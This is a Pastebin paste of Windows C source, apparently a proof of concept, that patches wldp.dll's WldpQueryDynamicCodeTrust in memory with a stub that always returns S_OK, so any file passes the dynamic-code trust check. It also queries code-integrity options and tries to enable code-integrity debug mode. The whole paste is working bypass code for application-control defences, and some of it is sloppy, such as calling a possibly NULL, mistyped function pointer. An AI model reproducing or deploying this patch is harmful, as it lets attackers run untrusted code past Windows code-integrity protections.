SHARE
TWEET

Untitled

a guest Sep 19th, 2019 80 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /**
  2.   BSD 3-Clause License
  3.  
  4.   Copyright (c) 2019 Odzhan. All rights reserved.
  5.  
  6.   Redistribution and use in source and binary forms, with or without
  7.   modification, are permitted provided that the following conditions are met:
  8.  
  9.   * Redistributions of source code must retain the above copyright notice, this
  10.     list of conditions and the following disclaimer.
  11.  
  12.   * Redistributions in binary form must reproduce the above copyright notice,
  13.     this list of conditions and the following disclaimer in the documentation
  14.     and/or other materials provided with the distribution.
  15.  
  16.   * Neither the name of the copyright holder nor the names of its
  17.     contributors may be used to endorse or promote products derived from
  18.     this software without specific prior written permission.
  19.  
  20.   THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
  21.   AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
  22.   IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
  23.   DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
  24.   FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
  25.   DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
  26.   SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
  27.   CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
  28.   OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
  29.   OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
  30. */
  31.  
  32. #include <windows.h>
  33. #include <wldp.h>
  34. #include <stdio.h>
  35.  
  36.  
  37. typedef HRESULT (WINAPI *WldpIsDynamicCodePolicyEnabled_t)(
  38.     PBOOL  isEnabled);
  39.  
  40. typedef HRESULT (WINAPI *WldpQueryDynamicCodeTrust_t)(
  41.     HANDLE fileHandle,
  42.     PVOID  baseImage,
  43.     ULONG  ImageSize);
  44.  
  45. // fake function that always returns S_OK
  46. static HRESULT WINAPI WldpQueryDynamicCodeTrustStub(
  47.     HANDLE fileHandle,
  48.     PVOID  baseImage,
  49.     ULONG  ImageSize)
  50. {
  51.     return S_OK;
  52. }
  53.  
  54. static VOID WldpQueryDynamicCodeTrustStubEnd(VOID) {}
  55.  
  56. static BOOL PatchWldp(VOID) {
  57.     BOOL    patched = FALSE;
  58.     HMODULE wldp;
  59.     DWORD   len, op, t;
  60.     LPVOID  cs;
  61.    
  62.     // load wldp
  63.     wldp = LoadLibrary("wldp");
  64.    
  65.     if(wldp != NULL) {
  66.       // resolve address of function to patch
  67.       cs = GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
  68.      
  69.       if(cs != NULL) {
  70.         // calculate length of stub
  71.         len = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd -
  72.           (ULONG_PTR)WldpQueryDynamicCodeTrustStub;
  73.          
  74.         // make the memory writeable
  75.         if(VirtualProtect(
  76.           cs, len, PAGE_EXECUTE_READWRITE, &op))
  77.         {
  78.           // over write with stub
  79.           memcpy(cs, &WldpQueryDynamicCodeTrustStub, len);
  80.        
  81.           patched = TRUE;
  82.        
  83.           // set back to original protection
  84.           VirtualProtect(cs, len, op, &t);
  85.         }
  86.       }
  87.     }
  88.     return patched;
  89. }
  90.  
  91. BOOL VerifyCodeTrust(const char *path) {
  92.     WldpQueryDynamicCodeTrust_t _WldpQueryDynamicCodeTrust;
  93.     HMODULE                     wldp;
  94.     HANDLE                      file, map, mem;
  95.     HRESULT                     hr = -1;
  96.     DWORD                       low, high;
  97.    
  98.     // load wldp
  99.     wldp = LoadLibrary("wldp");
  100.     _WldpQueryDynamicCodeTrust =
  101.       (WldpQueryDynamicCodeTrust_t)
  102.       GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
  103.    
  104.     // return FALSE on failure
  105.     if(_WldpQueryDynamicCodeTrust == NULL) {
  106.       printf("Unable to resolve address for WLDP.dll!WldpQueryDynamicCodeTrust.\n");
  107.       return FALSE;
  108.     }
  109.    
  110.     // open file reading
  111.     file = CreateFile(
  112.       path, GENERIC_READ, FILE_SHARE_READ,
  113.       NULL, OPEN_EXISTING,
  114.       FILE_ATTRIBUTE_NORMAL, NULL);
  115.    
  116.     if(file != INVALID_HANDLE_VALUE) {
  117.       // get size
  118.       low = GetFileSize(file, &high);
  119.       if(low != 0) {
  120.         // create mapping
  121.         map = CreateFileMapping(file, NULL, PAGE_READONLY, 0, 0, 0);
  122.         if(map != NULL) {
  123.           // get pointer to memory
  124.           mem = MapViewOfFile(map, FILE_MAP_READ, 0, 0, 0);
  125.           if(mem != NULL) {
  126.             // verify signature
  127.             hr = _WldpQueryDynamicCodeTrust(0, mem, low);              
  128.             UnmapViewOfFile(mem);
  129.           }
  130.           CloseHandle(map);
  131.         }
  132.       }
  133.       CloseHandle(file);
  134.     }
  135.     return hr == S_OK;
  136. }
  137.  
  138. #include "C:\ntlib\ntddk.h"
  139.  
  140. #define SystemCodeIntegrityInformation 0x67
  141.  
  142. #define CODEINTEGRITY_OPTION_ENABLED                      0x0001
  143. #define CODEINTEGRITY_OPTION_TESTSIGN                     0x0002
  144. #define CODEINTEGRITY_OPTION_UMCI_ENABLED                 0x0004
  145. #define CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED       0x0008
  146. #define CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED  0x0010
  147. #define CODEINTEGRITY_OPTION_TEST_BUILD                   0x0020
  148. #define CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD          0x0040
  149. #define CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED            0x0080
  150. #define CODEINTEGRITY_OPTION_FLIGHT_BUILD                 0x0100
  151. #define CODEINTEGRITY_OPTION_FLIGHTING_ENABLED            0x0200
  152. #define CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED            0x0400
  153. #define CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED  0x0800
  154. #define CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED 0x1000
  155. #define CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED             0x2000
  156.  
  157. typedef struct _ci_opt {
  158.     ULONG ulOption;
  159.     PCHAR szOption;
  160. } ci_opt;
  161.  
  162. ci_opt options[]={
  163.   {CODEINTEGRITY_OPTION_ENABLED,"CODEINTEGRITY_OPTION_ENABLED"},
  164.   {CODEINTEGRITY_OPTION_TESTSIGN,"CODEINTEGRITY_OPTION_TESTSIGN"},
  165.   {CODEINTEGRITY_OPTION_UMCI_ENABLED,"CODEINTEGRITY_OPTION_UMCI_ENABLED"},
  166.   {CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED,"CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED"},
  167.   {CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED,"CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED"},
  168.   {CODEINTEGRITY_OPTION_TEST_BUILD,"CODEINTEGRITY_OPTION_TEST_BUILD"},
  169.   {CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD,"CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD"},
  170.   {CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED,"CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED"},
  171.   {CODEINTEGRITY_OPTION_FLIGHT_BUILD,"CODEINTEGRITY_OPTION_FLIGHT_BUILD"},
  172.   {CODEINTEGRITY_OPTION_FLIGHTING_ENABLED,"CODEINTEGRITY_OPTION_FLIGHTING_ENABLED"},
  173.   {CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED,"CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED"},
  174.   {CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED,"CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED"},
  175.   {CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED,"CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED"},
  176.   {CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED,"CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED"},
  177.   {0, NULL}
  178. };
  179.  
  180. typedef struct _SYSTEM_CODEINTEGRITY_INFORMATION {
  181.     ULONG  Length;
  182.     ULONG  CodeIntegrityOptions;
  183. } SYSTEM_CODEINTEGRITY_INFORMATION, *PSYSTEM_CODEINTEGRITY_INFORMATION;
  184.  
  185. VOID ListCIOptions(VOID) {
  186.     NTSTATUS                         status;
  187.     SYSTEM_CODEINTEGRITY_INFORMATION scii;
  188.     DWORD                            i, len;
  189.    
  190.     scii.Length = sizeof(scii);
  191.    
  192.     status = NtQuerySystemInformation(
  193.       SystemCodeIntegrityInformation,
  194.       &scii, sizeof(scii), &len);
  195.      
  196.     if(NT_SUCCESS(status)) {
  197.       printf("\nCode Integrity Options.\n\n");
  198.       for(i=0;options[i].ulOption != 0; i++) {
  199.         if(scii.CodeIntegrityOptions & options[i].ulOption) {
  200.           printf("%s\n", options[i].szOption);
  201.         }
  202.       }
  203.     }
  204. }
  205.  
  206. // Trying to set the code integrity options will return STATUS_INVALID_INFO_CLASS
  207.  
  208. BOOL EnableCIOption(ULONG Option) {
  209.     NTSTATUS                         status;
  210.     SYSTEM_CODEINTEGRITY_INFORMATION scii;
  211.     DWORD                            i, len;
  212.    
  213.     scii.Length = sizeof(scii);
  214.    
  215.     status = NtQuerySystemInformation(
  216.       SystemCodeIntegrityInformation,
  217.       &scii, sizeof(scii), &len);
  218.      
  219.     if(NT_SUCCESS(status)) {
  220.       scii.CodeIntegrityOptions |= CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED;
  221.       status = NtSetSystemInformation(
  222.         SystemCodeIntegrityInformation,
  223.         &scii, sizeof(scii), &len);
  224.        
  225.       printf("status is %08lx\n", status);
  226.     }
  227.     return NT_SUCCESS(status);
  228. }
  229.  
  230. int main(int argc, char *argv[]) {
  231.     int                              i;
  232.     WldpIsDynamicCodePolicyEnabled_t WldpIsDynamicCodePolicyEnabled;
  233.     BOOL                             enabled;
  234.    
  235.     EnableCIOption(CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED);
  236.    
  237.     ListCIOptions();
  238.    
  239.     WldpIsDynamicCodePolicyEnabled =
  240.       (WldpIsDynamicCodePolicyEnabled_t)
  241.       GetProcAddress(LoadLibrary("wldp"), "WldpQueryDynamicCodeTrust");
  242.    
  243.     if(WldpIsDynamicCodePolicyEnabled == NULL) {
  244.       printf("unable to load Wldp.\n");
  245.     }
  246.    
  247.     WldpIsDynamicCodePolicyEnabled(&enabled);
  248.    
  249.     printf("Wldp Code Policy is %s.\n",
  250.       enabled ? "enabled" : "disabled");
  251.    
  252.     if(!PatchWldp()) {
  253.       printf("unable to patch Wldp.\n");
  254.       return 0;
  255.     }
  256.    
  257.     for(i=1; i<argc; i++) {
  258.       // skip directories
  259.       if(GetFileAttributes(argv[i]) & FILE_ATTRIBUTE_DIRECTORY) continue;
  260.       // verify file
  261.       printf("%-8s : %s\n",
  262.         VerifyCodeTrust(argv[i]) ? "OK" : "FAILED",
  263.         argv[i]);
  264.     }
  265.     return 0;
  266. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top